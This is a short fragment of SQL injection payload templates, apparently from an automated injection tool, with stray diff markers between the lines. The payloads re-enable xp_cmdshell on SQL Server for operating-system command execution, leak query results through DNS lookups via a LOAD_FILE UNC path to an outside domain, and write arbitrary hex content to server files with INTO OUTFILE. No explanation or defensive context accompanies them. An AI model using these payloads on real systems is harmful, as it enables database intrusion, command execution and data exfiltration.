				`EXEC master..sp_dropextendedproc 'xp_cmdshell'`
				`@@ -0,0 +1 @@`
				`EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'`
				`@@ -0,0 +1 @@`
				`SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%'))`
				`@@ -0,0 +1 @@`
				`LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -`